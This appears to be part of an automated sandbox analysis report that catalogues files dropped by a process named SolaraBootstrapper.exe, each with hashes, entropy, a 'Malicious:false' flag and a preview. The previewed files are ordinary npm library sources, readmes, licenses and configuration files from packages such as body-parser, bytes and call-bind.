                                                  SSDEEP:24:1tAcoSZ8gGzjoKHb6YIKWJrDF925a/7kJyEyF0eOCYunEfu7WR:1tVS/tbdIga/7xPYun7WR
                                                  MD5:0661686D08E2F4E6DA6AC771712A9B6C
                                                  SHA1:15CEEA114823DAFB83860895B0779FCADB115653
                                                  SHA-256:0448FF6C00A9D808B70C4ADBA9E6C6E1D81569BBB0ABCB335E1DD6F453B83334
                                                  SHA-512:C14ED4926C9D5230B4E5EC8C6CE710354E488B7357970079FF5BA45F65D6FAD9E3F178888ECA97240133EAD341429AE6458580838A48636451ED41C29B351312
                                                  Malicious:false
                                                  Preview:# Security Policies and Procedures..## Reporting a Bug..The Express team and community take all security bugs seriously. Thank you.for improving the security of Express. We appreciate your efforts and.responsible disclosure and will make every effort to acknowledge your.contributions...Report security bugs by emailing the current owner(s) of `body-parser`. This.information can be found in the npm registry using the command.`npm owner ls body-parser`..If unsure or unable to get the information from the above, open an issue.in the [project issue tracker](https://github.com/expressjs/body-parser/issues).asking for the current contact information...To ensure the timely response to your report, please ensure that the entirety.of the report is contained within the email body and not solely behind a web.link or an attachment...At least one owner will acknowledge your email within 48 hours, and will send a.more detailed response within 48 hours indicating the next steps in handling.your report
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2681
                                                  Entropy (8bit):4.724146691373171
                                                  Encrypted:false
                                                  SSDEEP:48:1FdMUJqE7rArelsWxYAsprpAkZqlprpAY8prpAQGprpAwBwWNiCp7pM9zDVKvWlt:1FzqEPselsWeAstGSqltGY8tGQGtGwBO
                                                  MD5:B9E991C0E57C4D5ADDE68A2F4F063BC7
                                                  SHA1:0CB6B9EB7B310C37E5950BBCAF672943657C94B5
                                                  SHA-256:9C6C900E7E85FB599C62D9B9E4DFD2EA2F61D119DCE5ED69AC3A8DA828819241
                                                  SHA-512:3BBD31EED55C32435B01FE7356D39749E95F8F49222115ADA841E751AD36227E6F427EFDC4E8BAD36D8CCD37C2E92C01FA67C24C23F52023DF8C1E1BE1A3B4F6
                                                  Malicious:false
                                                  Preview:/*!. * body-parser. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module dependencies.. * @private. */..var deprecate = require('depd')('body-parser')../**. * Cache of loaded parsers.. * @private. */..var parsers = Object.create(null)../**. * @typedef Parsers. * @type {function}. * @property {function} json. * @property {function} raw. * @property {function} text. * @property {function} urlencoded. */../**. * Module exports.. * @type {Parsers}. */..exports = module.exports = deprecate.function(bodyParser,. 'bodyParser: use individual json/urlencoded middlewares')../**. * JSON parser.. * @public. */..Object.defineProperty(exports, 'json', {. configurable: true,. enumerable: true,. get: createParserGetter('json').})../**. * Raw parser.. * @public. */..Object.defineProperty(exports, 'raw', {. configurable: true,. enumerable: true,. get: createParserGetter('raw').})../**. * Text parser.. * @public. */..Object.defineProperty(exports, 't
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):4325
                                                  Entropy (8bit):4.621879737023549
                                                  Encrypted:false
                                                  SSDEEP:96:1F2ISKMGJ0n9WbOaHSb+IR1+GFQBnPQCbfkZ/OPqgVB9OuCyMQ:1FwZYbhHSb9R1+GFQBICbfkWVBqlQ
                                                  MD5:C148BB38C59CE266E271C96AB1F2D192
                                                  SHA1:027F3FBD8A5370DDEC744D33EC9D594DB41F6293
                                                  SHA-256:1E9E274755366C39AE70E8B9A7A42FC12219566E67EFAF9B7EBC2A8B337F5B6B
                                                  SHA-512:BC4779CDA1A3B130EB8CF76BB40676046CEB514DDC5C1891D7324776E6188E5D5CEB4C0799CF2FBC007786849ED07903CB59F61FFCAC407300EEF0A16CB7C498
                                                  Malicious:false
                                                  Preview:/*!. * body-parser. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module dependencies.. * @private. */..var createError = require('http-errors').var destroy = require('destroy').var getBody = require('raw-body').var iconv = require('iconv-lite').var onFinished = require('on-finished').var unpipe = require('unpipe').var zlib = require('zlib')../**. * Module exports.. */..module.exports = read../**. * Read a request into a buffer and parse.. *. * @param {object} req. * @param {object} res. * @param {function} next. * @param {function} parse. * @param {function} debug. * @param {object} options. * @private. */..function read (req, res, next, parse, debug, options) {. var length. var opts = options. var stream.. // flag as parsed. req._body = true.. // read options. var encoding = opts.encoding !== null. ? opts.encoding. : null. var verify = opts.verify.. try {. // get the content stream. stream = contentstream(req, debug
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):5299
                                                  Entropy (8bit):4.88521461099306
                                                  Encrypted:false
                                                  SSDEEP:96:1F+Graz+dz1PbSDp2qjlvqzi+QBYwxcG5l+NbkAZiVl7g6A4QYSR:1F+Graz8TUj0mx+wOgybriVZg6ffSR
                                                  MD5:6B036408F968978BF9668496DB9953BA
                                                  SHA1:AF1F14428152576F1C047C3462D26A7FEB98635A
                                                  SHA-256:44F8B529333004E2AAFF6DB3A1DBE7068F1AC5FA1173E9634686A78C2262AF35
                                                  SHA-512:89BEF97D3D5D0C8DA0F3AA1E178FEE1D04EEE5200C2F037BD55761A61E6C6A251F7314E82343761EF227A997909F4A0237A3FF5F79A1A7BB9E879A465AB84F86
                                                  Malicious:false
                                                  Preview:/*!. * body-parser. * Copyright(c) 2014 Jonathan Ong. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module dependencies.. * @private. */..var bytes = require('bytes').var contentType = require('content-type').var createError = require('http-errors').var debug = require('debug')('body-parser:json').var read = require('../read').var typeis = require('type-is')../**. * Module exports.. */..module.exports = json../**. * RegExp to match the first non-space in a string.. *. * Allowed whitespace is defined in RFC 7159:. *. * ws = *(. * %x20 / ; Space. * %x09 / ; Horizontal tab. * %x0A / ; Line feed or New line. * %x0D ) ; Carriage return. */..var FIRST_CHAR_REGEXP = /^[\x20\x09\x0a\x0d]*([^\x20\x09\x0a\x0d])/ // eslint-disable-line no-control-regex..var JSON_SYNTAX_CHAR = '#'.var JSON_SYNTAX_REGEXP = /#+/g../**. * Create a middleware to parse JSON
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1884
                                                  Entropy (8bit):4.734957205525373
                                                  Encrypted:false
                                                  SSDEEP:48:1FdMU1sdsz5XSaS+PTAzZmm5ZJp2p3zyxdEBYwWdk7cGMdIeUpnm5JkXY2xR:1F32Q5TSvp2p3+QBYwxcGzbJqQYSR
                                                  MD5:ACB38E4FE575AFAF8D1A257E47C6E362
                                                  SHA1:EA7411FF5A71DF8D426322D07103E5894630E29B
                                                  SHA-256:4E9CC80A7EE8BD667C68C264B4C374B28E731246DDB6EC22C3968DAF837E30A2
                                                  SHA-512:157427AD25390339B045B9BB81753709498B69B2CC8B9C918C19D52D1CB4F6BBE5B6B07885D0A7F66EF359B7080DC9A42216F71911B08ADE04C1A112192BFF50
                                                  Malicious:false
                                                  Preview:/*!. * body-parser. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module dependencies.. */..var bytes = require('bytes').var debug = require('debug')('body-parser:raw').var read = require('../read').var typeis = require('type-is')../**. * Module exports.. */..module.exports = raw../**. * Create a middleware to parse raw bodies.. *. * @param {object} [options]. * @return {function}. * @api public. */..function raw (options) {. var opts = options || {}.. var inflate = opts.inflate !== false. var limit = typeof opts.limit !== 'number'. ? bytes.parse(opts.limit || '100kb'). : opts.limit. var type = opts.type || 'application/octet-stream'. var verify = opts.verify || false.. if (verify !== false && typeof verify !== 'function') {. throw new TypeError('option verify must be function'). }.. // create the appropriate type checking function. var shouldParse = typeof type !== 'function'. ? typeChecker(type). : type.. functi
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2285
                                                  Entropy (8bit):4.7291774030563944
                                                  Encrypted:false
                                                  SSDEEP:48:1FdMU11dbYJMShSexPYAzZmm5ZJp2pgzyxdEBYwWdk7cGMdSeUunm54qk+tg6Akl:1F3vbYJBSeXp2pg+QBYwxcGBbk27g6A6
                                                  MD5:BEB4ADA09306F8D6435566D9E88076D3
                                                  SHA1:EDA9BC036C9D10F1400CD2E4A8832949671CADC7
                                                  SHA-256:54A6E8EF720B06A300B21F6C60387805DEC743A64154784A609DFE8C6860776A
                                                  SHA-512:5D9C9C6837B9599D29DB9B1EB54CD2A4E215FEEB028137F31C20F2B02E38F600AA8C02721444DC41D7BFC206AD39A810076853D09FA1E3113B5708A75443131E
                                                  Malicious:false
                                                  Preview:/*!. * body-parser. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module dependencies.. */..var bytes = require('bytes').var contentType = require('content-type').var debug = require('debug')('body-parser:text').var read = require('../read').var typeis = require('type-is')../**. * Module exports.. */..module.exports = text../**. * Create a middleware to parse text bodies.. *. * @param {object} [options]. * @return {function}. * @api public. */..function text (options) {. var opts = options || {}.. var defaultCharset = opts.defaultCharset || 'utf-8'. var inflate = opts.inflate !== false. var limit = typeof opts.limit !== 'number'. ? bytes.parse(opts.limit || '100kb'). : opts.limit. var type = opts.type || 'text/plain'. var verify = opts.verify || false.. if (verify !== false && typeof verify !== 'function') {. throw new TypeError('option verify must be function'). }.. // create the appropriate type checking function. var
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):5797
                                                  Entropy (8bit):4.705418003838086
                                                  Encrypted:false
                                                  SSDEEP:96:1F+GrIE8S/wtosB5XaYp2Yy+QBYwxcGw+NbaZMz71LX7g6KspqOJUICK0mMQ7eLR:1F+GrIE8S/wtoGXaUyx+wODybGMz7132
                                                  MD5:906A833480CE8841BFA5AEB95B5C085F
                                                  SHA1:8F74A7D616BF363B78844D3BCC2F554D7C76A952
                                                  SHA-256:752717D87AAD57451638AF2073B04EBA964F348910C0BCF0070C43E732DE5EB2
                                                  SHA-512:7676871DD3012DAD0472BE51698D9D1677622BA3D392417A41D22EF7F6D7DF6C8085516BB9BDC45D4F125815161899AA889D756D18CD41F11E2402E659F7934D
                                                  Malicious:false
                                                  Preview:/*!. * body-parser. * Copyright(c) 2014 Jonathan Ong. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module dependencies.. * @private. */..var bytes = require('bytes').var contentType = require('content-type').var createError = require('http-errors').var debug = require('debug')('body-parser:urlencoded').var deprecate = require('depd')('body-parser').var read = require('../read').var typeis = require('type-is')../**. * Module exports.. */..module.exports = urlencoded../**. * Cache of parser modules.. */..var parsers = Object.create(null)../**. * Create a middleware to parse urlencoded bodies.. *. * @param {object} [options]. * @return {function}. * @public. */..function urlencoded (options) {. var opts = options || {}.. // notice because option default will flip in next major. if (opts.extended === undefined) {. deprecate('undefined extended: provide extended option'). }.. var extended = opts.extended !== false. var inflate = opts
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1472
                                                  Entropy (8bit):4.8087157197270995
                                                  Encrypted:false
                                                  SSDEEP:24:jX6f1exVWbe9qw6uO1mrnLeRYBCivIZ2lPWEwf6Tk0XxLt:jXK4VWbe9LfjLeRYBCivIAgE66T7Xx5
                                                  MD5:826BD4315438573BA1A6D88AE2A2AA65
                                                  SHA1:3E27986A947E7D10488739C9AFB75F96B646C4C5
                                                  SHA-256:0FD31AD69FDCF1E2A94530F9DB9C93E96709B690393A14711643123F678EE956
                                                  SHA-512:2E98BA8E57CB0950E45D20365D16E86AD94A60CFD4CF103B7D55DAE02DE677985D37C0F771E16AE0A628CB3B59ADCE8A9E1742CFFC298F18CB7D935D72536E6D
                                                  Malicious:false
                                                  Preview:{. "name": "body-parser",. "description": "Node.js body parsing middleware",. "version": "1.20.2",. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>",. "Jonathan Ong <me@jongleberry.com> (http://jongleberry.com)". ],. "license": "MIT",. "repository": "expressjs/body-parser",. "dependencies": {. "bytes": "3.1.2",. "content-type": "~1.0.5",. "debug": "2.6.9",. "depd": "2.0.0",. "destroy": "1.2.0",. "http-errors": "2.0.0",. "iconv-lite": "0.4.24",. "on-finished": "2.4.1",. "qs": "6.11.0",. "raw-body": "2.5.2",. "type-is": "~1.6.18",. "unpipe": "1.0.0". },. "devDependencies": {. "eslint": "8.34.0",. "eslint-config-standard": "14.1.1",. "eslint-plugin-import": "2.27.5",. "eslint-plugin-markdown": "3.0.0",. "eslint-plugin-node": "11.1.0",. "eslint-plugin-promise": "6.1.1",. "eslint-plugin-standard": "4.1.0",. "methods": "1.1.2",. "mocha": "10.2.0",. "nyc": "15.1.0",. "safe-buffer": "5.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1775
                                                  Entropy (8bit):4.694879284534119
                                                  Encrypted:false
                                                  SSDEEP:24:nDK2pjiS0+M6XTlXgZni4p3qm343hab1M1uvPgaR4x5nxNpXXqIP7pFZAQsOTnPz:DKZ+jD9upaPKgaS/lpbEOTnP4s
                                                  MD5:38354AB8C37C42C3CEE19CF5896BBDEF
                                                  SHA1:543550BE9E713608304AE2F89A7E9B4DF070EC8F
                                                  SHA-256:B335E48648E33BD56C3BCADBDAD4C5A8B419099E7369D3DC845C106DDB49FC1C
                                                  SHA-512:42ABFF3AB270C275DE95CEEC061D5C16E5C2754A4B9B6EBFA6A3417DD8C314CE492C86CD5747B463C633A4560CD9DE7AC5A94087A4F864EAAE3F20DCD6FCE4EE
                                                  Malicious:false
                                                  Preview:3.1.2 / 2022-01-27.==================.. * Fix return value for un-parsable strings..3.1.1 / 2021-11-15.==================.. * Fix "thousandsSeparator" incorrecting formatting fractional part..3.1.0 / 2019-01-22.==================.. * Add petabyte (`pb`) support..3.0.0 / 2017-08-31.==================.. * Change "kB" to "KB" in format output. * Remove support for Node.js 0.6. * Remove support for ComponentJS..2.5.0 / 2017-03-24.==================.. * Add option "unit"..2.4.0 / 2016-06-01.==================.. * Add option "unitSeparator"..2.3.0 / 2016-02-15.==================.. * Drop partial bytes on all parsed units. * Fix non-finite numbers to `.format` to return `null`. * Fix parsing byte string that looks like hex. * perf: hoist regular expressions..2.2.0 / 2015-11-13.==================.. * add option "decimalPlaces". * add option "fixedDecimals"..2.1.0 / 2015-05-21.==================.. * add `.format` export. * add `.parse` export..2.0.2 / 2015-05-20.================
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1153
                                                  Entropy (8bit):5.209440330924807
                                                  Encrypted:false
                                                  SSDEEP:24:5MdiJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:uiJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:013E95467EDDB048F19A6F5B42820F86
                                                  SHA1:0B84CDB9FC6263EC17D8991D9109922B840D4F30
                                                  SHA-256:E3B44AF066615DE2EA48D18D852D0762F18C0B2EFCEA714FA48A6F729D405B85
                                                  SHA-512:940AE401DCCECEE292BB5997C97E8B02DDF90C2B3E9EA88EF712CCAF0051F64E62A321C899472E2EB133AB4643AAFDCB30F2BDB1313229D5B5F52900827E98D3
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2012-2014 TJ Holowaychuk <tj@vision-media.ca>.Copyright (c) 2015 Jed Watson <jed.watson@me.com>..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER LIABILITY, WH
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):4770
                                                  Entropy (8bit):4.976342344705789
                                                  Encrypted:false
                                                  SSDEEP:48:xFqXmR2NdXMoNj4CUGLaHtT8sZkwadPZvCLvqv/pyiKmfFapucGa3cmWqMb8JbRZ:WXn15sTGeH8sSJWJTHsyfKBM
                                                  MD5:E7804750B4DBB0E9169BE6BC020C8E6F
                                                  SHA1:C1F64BB7089CB59D5B3D929388118D25448AE22A
                                                  SHA-256:761E5A8818F8DE496A4DF6632FA30DF65B62E00D5DB2B297096C63E07D61F740
                                                  SHA-512:645F50F3627629A5C62175B1182D2279CAD099F6B4F02B3F0FE7B604FCC64A73A7E5A0B25A225BC25326DC7A8A30AEAA2AB060FBFBBA2DDB92FDAD6673C22C35
                                                  Malicious:false
                                                  Preview:# Bytes utility..[![NPM Version][npm-image]][npm-url].[![NPM Downloads][downloads-image]][downloads-url].[![Build Status][ci-image]][ci-url].[![Test Coverage][coveralls-image]][coveralls-url]..Utility to parse a string bytes (ex: `1TB`) to bytes (`1099511627776`) and vice-versa...## Installation..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/). Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally):..```bash.$ npm install bytes.```..## Usage..```js.var bytes = require('bytes');.```..#### bytes(number.string value, [options]): number.string.null..Default export function. Delegates to either `bytes.format` or `bytes.parse` based on the type of `value`...**Arguments**..| Name | Type | Description |.|---------|----------|--------------------|.| value | `number`.`string` | Number value to format or string value to parse |.| options |
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3613
                                                  Entropy (8bit):4.963890806793395
                                                  Encrypted:false
                                                  SSDEEP:96:QEjKPg9hhYRkwG5jLnIzF6ujn5qamj0lf7aEb7VhhY54jAoKTybbH:QEjKPUh6KV5jTIzpj5qBjy7tb7rjrKW3
                                                  MD5:83CF8FE86424252C5A9A3E2FE90DBD57
                                                  SHA1:BD46529E5637FF1A659F1D4AF2598925B12741E0
                                                  SHA-256:893FCBBBE962DC00E40DC2E4B20E76E92D874DD257345003C6575D940E91A37F
                                                  SHA-512:F0630152A247CF51DFC677C22323AFCCC667350A11DB093B59B93F403481DEBA1D44CD78CD53F4C4A3E2DF297C35FE54CDC841C10C4667EBB81D3A54FBF56D43
                                                  Malicious:false
                                                  Preview:/*!. * bytes. * Copyright(c) 2012-2014 TJ Holowaychuk. * Copyright(c) 2015 Jed Watson. * MIT Licensed. */..'use strict';../**. * Module exports.. * @public. */..module.exports = bytes;.module.exports.format = format;.module.exports.parse = parse;../**. * Module variables.. * @private. */..var formatThousandsRegExp = /\B(?=(\d{3})+(?!\d))/g;..var formatDecimalsRegExp = /(?:\.0*|(\.[^0]+)0+)$/;..var map = {. b: 1,. kb: 1 << 10,. mb: 1 << 20,. gb: 1 << 30,. tb: Math.pow(1024, 4),. pb: Math.pow(1024, 5),.};..var parseRegExp = /^((-|\+)?(\d+(?:\.\d+)?)) *(kb|mb|gb|tb|pb)$/i;../**. * Convert the given value in bytes into a string or parse to string to an integer in bytes.. *. * @param {string|number} value. * @param {{. * case: [string],. * decimalPlaces: [number]. * fixedDecimals: [boolean]. * thousandsSeparator: [string]. * unitSeparator: [string]. * }} [options] bytes options.. *. * @returns {string|number|null}. */..function bytes(value, options) {. if (typeof value === 'st
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):959
                                                  Entropy (8bit):4.7529840913796395
                                                  Encrypted:false
                                                  SSDEEP:12:WJFGQhgA615EQN54SxR4jRp4jW8AFa5hkIQZLCYuNZWeTjk6tDGCjPcWdVbm09Lt:AFiA615Vhx6HTmwuYuNZWednVLt
                                                  MD5:5E3137FEEC27C5D88693E0CB2FF95D3C
                                                  SHA1:D8FE3E70EB4ECF4BF58385E4B27F89B7CE656A28
                                                  SHA-256:99B21C09CE812DC76A06CD87C4753247CB9615C6A8501C5A5A9D9CAA22EA2D12
                                                  SHA-512:4B4D89317E1A1CAAE6924F234B75E15BD2F8BD026D316152E6CF3FFAC53553BEA2995076A8A365F26A96730F36170D115AC35AAE6D0888F621F536D795B89A2D
                                                  Malicious:false
                                                  Preview:{. "name": "bytes",. "description": "Utility to parse a string bytes to bytes and vice-versa",. "version": "3.1.2",. "author": "TJ Holowaychuk <tj@vision-media.ca> (http://tjholowaychuk.com)",. "contributors": [. "Jed Watson <jed.watson@me.com>",. "Th.o FIDRY <theo.fidry@gmail.com>". ],. "license": "MIT",. "keywords": [. "byte",. "bytes",. "utility",. "parse",. "parser",. "convert",. "converter". ],. "repository": "visionmedia/bytes.js",. "devDependencies": {. "eslint": "7.32.0",. "eslint-plugin-markdown": "2.2.1",. "mocha": "9.2.0",. "nyc": "15.1.0". },. "files": [. "History.md",. "LICENSE",. "Readme.md",. "index.js". ],. "engines": {. "node": ">= 0.8". },. "scripts": {. "lint": "eslint .",. "test": "mocha --check-leaks --reporter spec",. "test-ci": "nyc --reporter=lcov --reporter=text npm test",. "test-cov": "nyc --reporter=html --reporter=text npm test". }.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):10
                                                  Entropy (8bit):3.121928094887362
                                                  Encrypted:false
                                                  SSDEEP:3:gUKvn:2
                                                  MD5:0549BABC2213B12C788BFEB5C47CAB97
                                                  SHA1:8525ADBDF9AC9A497E638CC69CEDD64804151830
                                                  SHA-256:5C5DAF48FDF4DB42E16C29B5B3DE54984BAFE0C2FF367A186CA97F1D4ED48290
                                                  SHA-512:54B84472ABA9DC81D7B5924FB74ED962803D24D463CB58E153F354E35630E04F2613279AFF3FBA6F0E612F796108ED3DA638BD134047D90DDA0D775CDE2F7306
                                                  Malicious:false
                                                  Preview:coverage/.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):208
                                                  Entropy (8bit):4.744582336034783
                                                  Encrypted:false
                                                  SSDEEP:3:EK8RL0x+Hf5NeVHDQLjXiVHM+OL+/FpHLL8/EzlvwR/6G+sNqR6LesNEvssTsmiF:ExL0UxNSHQytEL2pLL8alJbupsgtrQ1C
                                                  MD5:54C723B840318EC3718E0910A34EE231
                                                  SHA1:6AEFE8870750E237FC26246997B9F27F602B461E
                                                  SHA-256:75B6D0B1401BED73EFD3429ED52011077425266709CF4461867D577A5B7A69F4
                                                  SHA-512:4A5C98F96AC503CD8F88400F84DF780F1F9D9B76BB45142DF8F023E3E52371A30271EB12523B79026843D6E2C0C9C497CAE5E513D892463D5BFBFC9F7FF204AC
                                                  Malicious:false
                                                  Preview:{.."root": true,..."extends": "@ljharb",..."rules": {..."func-name-matching": 0,..."id-length": 0,..."new-cap": [2, {...."capIsNewExceptions": [....."GetIntrinsic",....],...}],..."no-magic-numbers": 0,..},.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):580
                                                  Entropy (8bit):4.7023374289648965
                                                  Encrypted:false
                                                  SSDEEP:12:OjjcfQWARgMqJugMJPH0FggM60lgM01bZBgMoGbQjgMy9gMLz4MI:qoQWAg0g+H0mg6lg7g1GegJ9gEz4D
                                                  MD5:998D321E18F24A2CA5521654FAA16E75
                                                  SHA1:DAD7FC03C586859956314397369A6F962A3DE957
                                                  SHA-256:A044E97E01DE6EEF53BDE25CB024443A21A04A84F339AD118031443D3427B8DB
                                                  SHA-512:64C89A2CE91EE7A1A12D06DCA4D7AFFE732C183A64BB11F8701D04F36B657DFE0B85DD94881852975CE44BD6F9181FE4E2EF1347E6AD31C960DF1745A8D82FFC
                                                  Malicious:false
                                                  Preview:# These are supported funding model platforms..github: [ljharb].patreon: # Replace with a single Patreon username.open_collective: # Replace with a single Open Collective username.ko_fi: # Replace with a single Ko-fi username.tidelift: npm/call-bind.community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry.liberapay: # Replace with a single Liberapay username.issuehunt: # Replace with a single IssueHunt username.otechie: # Replace with a single Otechie username.custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'].
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):139
                                                  Entropy (8bit):4.461548676043605
                                                  Encrypted:false
                                                  SSDEEP:3:uFx3jG9UDHfa7aBA9c4RIeeFHqpvc9PNUaUifEIkHJ03WhBK:Kw9OfyFdRaB9LUiMIOJHhBK
                                                  MD5:D0104F79F0B4F03BBCD3B287FA04CF8C
                                                  SHA1:54F9D7ADF8943CB07F821435BB269EB4BA40CCC2
                                                  SHA-256:997785C50B0773E5E18BF15550FBF57823C634FEFE623CD37B3C83696402AD0A
                                                  SHA-512:DAF9B5445CFC02397F398ADFA0258F2489B70699DFEC6CA7E5B85AFE5671FDCABE59EDEE332F718F5E5778FEB1E301778DFFE93BB28C1C0914F669659BAD39C6
                                                  Malicious:false
                                                  Preview:{.."all": true,.."check-coverage": false,.."reporter": ["text-summary", "text", "html", "json"],.."exclude": [..."coverage",..."test"..].}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):8142
                                                  Entropy (8bit):5.302938146171648
                                                  Encrypted:false
                                                  SSDEEP:96:E5yEmQ3y/4Gp0RJrB7Fu4gejUTB/9r4M+2c3m2CzJcRJA/7BDuC+APE:EgyRGiJ97tUTB/9Hc3nCziJA/lDbVE
                                                  MD5:5A2F345052AEF5E2B33ECA8936670B21
                                                  SHA1:BEF0B7EBA7753BDF0D78558D4C30CC17E9C7FC83
                                                  SHA-256:4F80EAC971436D49BCEC11D38C28BB3BB79142B48BBB7D1A7002BFA9A6AF42B4
                                                  SHA-512:3EC6E93F11269492EA8DBF75AABD8086352D63C8834A39B5C0C91ABBDA6708CF83A94E48B668782E349EAD5CFCF374155A1861F5AF9644CC6FC67454B4DFBAFB
                                                  Malicious:false
                                                  Preview:# Changelog..All notable changes to this project will be documented in this file...The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html)...## [v1.0.7](https://github.com/ljharb/call-bind/compare/v1.0.6...v1.0.7) - 2024-02-12..### Commits..- [Refactor] use `es-define-property` [`09b76a0`](https://github.com/ljharb/call-bind/commit/09b76a01634440461d44a80c9924ec4b500f3b03).- [Deps] update `get-intrinsic`, `set-function-length` [`ad5136d`](https://github.com/ljharb/call-bind/commit/ad5136ddda2a45c590959829ad3dce0c9f4e3590)..## [v1.0.6](https://github.com/ljharb/call-bind/compare/v1.0.5...v1.0.6) - 2024-02-05..### Commits..- [Dev Deps] update `aud`, `npmignore`, `tape` [`d564d5c`](https://github.com/ljharb/call-bind/commit/d564d5ce3e06a19df4d499c77f8d1a9da44e77aa).- [Deps] update `get-intrinsic`, `set-function-length` [`cfc2bdc`](https://github.com/ljharb/call-bind/commit/cfc2bd
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1071
                                                  Entropy (8bit):5.099362344791979
                                                  Encrypted:false
                                                  SSDEEP:24:tPsrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:VsaJHlxE3dQHOs5exm3ogFh
                                                  MD5:0EB2C73DAA0ECF037CBDF3D0BB0C98D5
                                                  SHA1:7087A92577C86806338A363A88A9A3B4F762E26D
                                                  SHA-256:39C5EC504CF6BD5CD782A7C695828E09189DF79F5D94840E4F08FEB97B9FD416
                                                  SHA-512:12A2A3BF2ABAFA5E3F669278EE332C87E4A164CFE54EF6019CA8B5F3D41F38F10224D52F471D0256AAD6600DEC9FB3A1EDF3C84F38CC9F1CFD4EB9A2AF8A0066
                                                  Malicious:false
